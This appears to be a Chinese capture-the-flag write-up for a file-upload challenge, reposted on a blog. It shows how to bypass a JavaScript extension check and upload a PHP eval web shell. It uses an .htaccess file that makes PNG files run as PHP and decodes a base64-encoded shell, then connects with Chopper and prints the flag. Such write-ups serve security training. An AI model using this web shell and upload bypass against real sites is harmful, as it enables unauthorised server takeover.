DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>title>
head>
<body>
<script language="javascript">
function Checkfiles()
{
var fup = document.getElementById('file');
var fileName = fup.value;
var ext = fileName.substring(fileName.lastIndexOf('.') + 1);
if(ext == "gif" || ext == "GIF" || ext == "JPEG" || ext == "jpeg" || ext == "jpg" || ext == "JPG" || ext == "png" || ext == "PNG")
{
return true;
}
else
{
alert("这个文件不好,我不喜欢");
return false;
}
}
script>
<form method="post" onsubmit="return Checkfiles()" enctype="multipart/form-data" >
<input type="file" name="file" id="file">
<input type="submit" name="1">
form>
body>
html>
发现有js前端校验,开发者模式禁用JavaScript即可绕过
尝试上马
php@eval($_POST['shell']);?>
发现后端会
<script>alert('文件内容也改改呗~');script>
尝试
<script language="php">@eval_r($_POST['hacker'])script>
靶机php版本已经禁用该方法,尝试其他思路
发现可以上传.htaccess文件
AddType application/x-httpd-php png
php_value auto_append_file "php://filter/convert.base64-decode/resource=web.png"
将png解析为php并在php运行时运行指定的web.png文件
base64编码为了绕过 上传.htaccess成功
uploads/c47b21fcf8f0bc8b3920541abd8024fd/.htaccess
上传base64编码的web.png
PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
即
php@eval($_POST['shell']);?>
index.php和上传文件并不在同一个目录内
访问上传的文件
PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
成功解析,上菜刀
Dest0g3{df92216a-8747-4bc9-b41c-6299693c9273}
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)